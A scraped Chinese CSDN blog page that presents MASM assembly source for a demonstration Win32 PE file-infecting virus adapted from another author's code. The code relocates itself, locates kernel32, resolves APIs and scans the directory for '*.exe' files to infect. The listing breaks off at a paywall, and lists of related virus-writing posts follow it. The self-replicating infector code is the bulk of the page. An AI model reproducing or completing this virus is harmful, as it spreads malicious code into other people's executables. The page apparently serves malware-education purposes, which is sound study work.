PE文件病毒感染示例

最新推荐文章于 2023-01-11 21:56:26 发布
最新推荐文章于 2023-01-11 21:56:26 发布
阅读量5.2k 收藏 5
点赞数
文章标签: header include api image file byte
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/long_xing/article/details/760111
版权
本文档提供了一个PE文件病毒感染的示例代码,包括查找API地址、感染文件和修改PE头的过程。通过阅读代码,可以了解病毒如何感染PE文件,并展示了一种简单的病毒传播机制。
摘要由CSDN通过智能技术生成

;本程序修改自hume的代码,其版权信息如下:

CopyRight              db "The SoftWare WAS OFFERRED by Hume[AfO]",0dh,0ah
                      db "        Thx for using it!",0dh,0ah
                      db "Contact: Humewen@21cn.com",0dh,0ah
                      db "        humeasm.yeah.net",0dh,0ah
                      db "The add Code SiZe:(heX)"

 

 

;------------------------------------------------------------------------------------------------------------------------

;main.asm代码

;-----------------------------------------------------------------------------------------------------------------------

.586 
.model flat, stdcall 
option casemap :none  ; case sensitive 
include windows.inc
include user32.inc
include comctl32.inc 
includelib comctl32.lib
includelib user32.lib
;;-------------- 

GetApiA        proto    :DWORD,:DWORD 

;;-------------- 
  .CODE 
  _Start0:
  invoke InitCommonControls
  jmp __Start
VirusLen        =  vEnd-vBegin                ;Virus 长度 
vBegin: 
;----------------------------------------- 
include s_api.asm                ;查找需要的api地址 
;----------------------------------------- 

fsize          dd ? 
hfile          dd ? 
hMap            dd ? 
pMem            dd ? 
;----------------------------------------- 
pe_Header      dd ? 
sec_align      dd ? 
file_align      dd ? 
newEip          dd ? 
oldEip          dd ? 
oldEipTemp      dd ?
inc_size        dd ? 
oldEnd          dd ?


hFind           dd ?
sFindData       WIN32_FIND_DATA <?>
 
readSize        dd 0
readBuff        db 10 dup(0)
;-----------------------------------------
sFindStr        db "*.exe",0

sMessageBoxA                            db "MessageBoxA",0 

aMessageBoxA                    dd 0 

;;临时变量... 
sztit                   db "病毒演示",0
szMsg                   db "感染此病毒的程序会显示该信息",0dh,0ah 
                        db "同时具有再感染其它程序的功能",0dh,0ah
                        db "病毒代码长度:(HEX)"
val                     dd 0,0,0,0 
;;----------------------------------------- 

__Start:
      call    _gd 
_gd:   
      pop    ebp                            ;得到delta地址 
      sub    ebp,offset _gd                 ;因为在其他程序中基址可能不是默认的所以需要重定位 
      mov    dword ptr [ebp+appBase],ebp    ;呵呵仔细想想 
     
  mov    eax,[esp]                          ;返回地址 
      xor    edx,edx 
getK32Base: 
      dec    eax                            ;逐字节比较验证 
      mov    dx,word  ptr [eax+IMAGE_DOS_HEADER.e_lfanew]  ;就是ecx+3ch
      test    dx,0f000h                      ;Dos Header+stub不可能太大,超过4096byte 
      jnz    getK32Base                      ;加速检验 
      cmp    eax,dword ptr [eax+edx+IMAGE_NT_HEADERS.OptionalHeader.ImageBase] 
      jnz    getK32Base                      ;看Image_Base值是否等于ecx即模块起始值, 
      mov    [ebp+k32Base],eax              ;如果是,就认为找到kernel32的Base值 
             lea    edi,[ebp+aGetModuleHandle] 
      lea    esi,[ebp+lpApiAddrs] 
lop_get: 
      lodsd 
      cmp    eax,0 
      jz      End_Get 
      add    eax,ebp 
      push    eax 
      push    dword ptr [ebp+k32Base] 
      call    GetApiA                         
      stosd 
      jmp    lop_get                          ;获得api地址,参见s_api文件                       
End_Get:  
      include dislen.asm
find_start:
      lea    eax,[ebp+sFindData]
      push   eax
      lea    eax,[ebp+sFindStr]
      push   eax
      call   [ebp+aFindFirstFile]
      mov    [ebp+hFind],eax
      cmp    eax,INVALID_HANDLE_VALUE
      je     find_exit
find_next:
     
      call    my_infect
      lea    eax,[ebp+sFindData]
      push   eax
      push   [ebp+hFind]
     

最低0.47元/天 解锁文章
long_xing
关注
PE文件病毒示例程序
03-22
很简单的PE文件病毒示例
憨憨也能写出PE病毒
bbszhenshuai的博客
05-18 2547
导语 这是我软件安全作业,希望对想要学习PE病毒编写的同学们有所帮助。 目标 编写一个PE文件传染程序infect.exe,功能要求如下: infect.exe运行后,向同目录下的notepad.exe程序植入“病毒载荷”代码. infect.exe不能重复传染notepad.exe. notepad.exe被植入“病毒载荷”后,具备如下行为:一旦执行,就会向其所在目录写入一个txt文件文件名为:学号-姓名.txt,文件内容为空。注意:这里的姓名和学号要改为同学自己的名字和学号。 基本思路 infe
关于PE病毒编写的学习(九)——追加病毒的编写(上)
蛛丝
10-27 1842
  OK,兑现我的承诺,从本章开始讲述“追加病毒”的编写方法。我们将实现一个只弹出对话框的良性病毒,但是考虑到这个代码可能造成的危害,我会在感染模块中写入一个小Bug。不过,对于大家的学习是毫无影响的。  回到正题,先介绍一下“追加病毒”,在DOS时代中,这种病毒相当常见。由于.com文件的入口点是固定的,而且我们知道DOS平台程序可以随意使用中断,因此追加病毒只要将病毒代码追加到宿主文件尾,然后修改入口点代码成“jmp [病毒入口点]”,病毒执行完成后,再jmp到宿主程序。  到了win32平台下,这种方
关于PE病毒编写的学习(十)——追加病毒的编写(下)
蛛丝
10-30 2712
  原本这一篇应该和上一篇同时发,但是我的原来代码写得很烂,而且由于我的目标是编写一个“追加病毒”框架,代码又要具备良好的模块特征。这两天改来改去,已经头脑混乱了,所以还是先发文章把原来的代码挂上,有时间再改,我会配上说明。  另外提一句,我把一个bug写再AddSection这个函数里,很多教学码也故意写这个错误,这个错误本意是修改由于PE文件头的修改使“xx值”应适当变化,实际写入的是空位置,这个值不应该变化,这个画蛇添足的行为会导致被感染文件出现一个对齐问题的错误,使系统认为它不是一个有效文件。自己独
写了一个添加节感染Intel X86 PE文件的程序(Virus)
_KaQqi的博客
02-08 572
为了加深一下PE文件的理解 就随手写了一个 其实ASM才是病毒的王道23333 不需要重定位 嘿嘿~ 这个程序会感染当前目录以及所有子目录中的所有的Intel x86类型的PE文件 写的不是很好 大牛勿喷. .686p .model flat,stdcall option casemap:none include InfectPe.inc .code start: assume
EXP2 分析PE感染程序
zjlong668的博客
04-16 966
1.分析感染后的可执行程序 感染前和感染后对比: main-new.exe:最先传播病毒的exe文件,大小:3KB test.exe:感染目标,感染前大小:2.5KB test2.exe:感染后的exe文件,感染后大小:6.5KB winhex打开这两个文件,利用相关功能分析(查看—>同步和比较) 感染前后文件不一样的地方就被winhex用黑色给标记出来了 一共有四处不一样: 感染前有3个节(00 03)感染后有4个节(00 04) 感染前时间戳为B...
感染PE文件示例源码(C++与汇编)
03-25
本资源提供了用C++和汇编语言编写的感染PE文件的源代码示例,旨在帮助学习者深入理解这一过程。 首先,我们要明确的是,"感染"PE文件通常指的是在不改变其原始功能的前提下,向文件中添加额外的代码或数据,这在...
PE文件感染 VC6.0 源码 PE结构
02-15
5. **loadEXE9**:根据提供的压缩包文件名,这可能是用于演示或研究PE文件感染的一个工具或示例代码。loadEXE9可能是一个小程序,演示了如何加载并执行一个外部PE文件,这在恶意软件中常见,也可能用于教学目的,...
最新EXE感染代码。PE头感染!
08-31
在提供的压缩包中,有一个名为“感染EXE的代码.txt”的文件,这很可能是详细解释或示例代码,展示了如何对PE文件进行感染。文本文件可能包含了以下内容: 1. **PE文件结构**:首先,它可能会解释PE文件的结构,包括...
PE文件病毒实验(二)——实验报告
热门推荐
jmhIcoding
03-01 1万+
实验目的:掌握PE文件格式;理解病毒感染PE文件的原理。 实验内容: (1) 了解PE文件格式。 (2) 根据实验步骤,编程实现在PE文件中插入病毒代码。运行插入病毒代码后的PE文件。 (3) 编程实现在磁盘中搜索.exe文件的操作,对于所有的.exe文件插入病毒代码并运行插入病毒代码后的exe文件。 (4) 编程实现在磁盘中搜索(3)中的.exe文件的操作,对于所有的.exe文件删除病毒代码并运...
WIN32 汇编写病毒感染PE文件
枪与玫瑰的专栏
05-05 4549
WIN32 汇编写病毒感染PE文件作者:PSH 日期:2007/3/26转载请注明出处,本人原创,欢迎交流。近来没事学习了下病毒技术,看到网上好多年青人对这个比较感兴趣,那就写出来大家分享下吧。1前提知识a.熟练WIN32 ASM 语言,不会ASM就难得写出感染PE的病毒。比如“熊猫”,就不是ASM 写的,他感染PE就是个捆绑机。b.熟悉PE文件的格式,不了解PE怎么写病毒,病毒就是修改PE文件
基于C++的shellcode及植入目标程序设计 课程报告+代码及exe可执行文件
毕业作品网站
05-15 603
目录 一.程序模块划分 1 二.主要模块描述 1 2.1 Shellcode 的生成 1 2.2 infect.cpp 简介 5 SetBytes 用于向文件指定位置覆盖写入 5 GetBytes 用于读取文件指定位置内容 5 获得 Dos 头中的 e_lfanew,即 PE 头的 RVA 6 三.传染模块的设计与实现 6 验证 PE 文件 8 2.获取 PE 头位置 9 四.PE 文件格式简述 10 Dos 头 10 PE header 11 SECTION TABLE 节
PE文件感染程序设计(PE病毒)
最新发布
Zyecho的博客
01-11 2771
记录PE病毒设计的入门实验
学习日记——(计算机病毒)PE文件病毒
weixin_54055099的博客
11-22 6217
一、相关知识 PE文件病毒的原理:PE文件病毒感染病毒时,将自身代码复制到目标文件PE文件病毒在目标文件前运行,那么,它是怎么做到的呢? 答:PE病毒感染其他文件的常见方法是: 在文件中添加一个新节,然后把病毒代码和执行后返回宿主程序的代码写入到新添加的节中; 同时修改PE文件头的入口地址,使它指向新添加的病毒代码入口; 这样做后,当程序运行时,首先运行病毒代码,运行完后再转去运行宿主代码。 PE文件病毒的感染过程: 第一种: 判断目标文件开始的两个字节是否为“MZ”; 判断PE文件
PE 文件型病毒编写实验(一)
jmhIcoding
11-09 1万+
这个学期终于圆了当年来读渣电的网络安全专业的一个梦:PE病毒编写。想起了高中那会儿熬夜看看雪论坛瞎搞什么软件破解,可是搞到后面很多东西不理解做的不深入,所以就先一本心思的考上渣电,然后再来深入的学习一下PE的相关。后面 渣电是考上啦,网络安全专业也考上啦,可是大一到大三虽然偶然零零星星地看了一些PE相关的东西,却一直没有集中化的时间来研究PE,因为总是有其它项目找上自己。这个学期刚好有计算机病毒这门
PE感染&ShellCode编写技术补充
Less Is More
05-28 3236
标 题: PE感染&ShellCode编写技术补充 时 间: 2013-06-04,22:45:53    上篇文章写了Windows Shell Code编写的一些技术和经验,其中讲到ShellCode中使用的数据的问题时,提供了三种方法: 1. HardCode地址,然后把数据写入HardCode的地址中 2. 转化法(HASH),把数据转化成可用寄存器存储的整数 3. 把数据Pu
PE文件的感染C++源代码
杨航的专栏
12-10 2918
PE文件的感染C++源代码 PE文件规定了可执行文件的格式,凡是符合此格式的文件都能在windows系统上运行。PE文件的格式暂且不谈,说一些感染PE文件的几种途径。 导入表感染。这个涉及比较复杂的操作,首先,要自行写一个dll文件,提供程序中对原dll引用的所有函数,然后增加一个节区,修改ImportAddress中的地址,使其指向新增加的节,这样,程序加载后,只要调用相关函数,就会先
PE病毒初探——向exe注入代码
weixin_34384557的博客
01-31 547
PE文件其实就是Windows可执行文件,关于它的一些简要介绍摘自百度:   PE文件被称为可移植的执行体是Portable Execute的全称,常见的EXE、DLL、OCX、SYS、COM都是PE文件PE文件是微软Windows操作系统上的程序文件(可能是间接被执行,如DLL)。   http://baike.baidu.com/view/1087038.htm   有一种病毒是...
Win32病毒编程初探:从入门到理解
这篇文章详细地介绍了Win32病毒的基本概念和技术,包括病毒的生命周期、PE文件结构、API的使用、以及高级的自我保护策略,是学习病毒编写基础知识的良好起点。然而,读者应始终记住,这些知识应当用于合法的安全研究...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值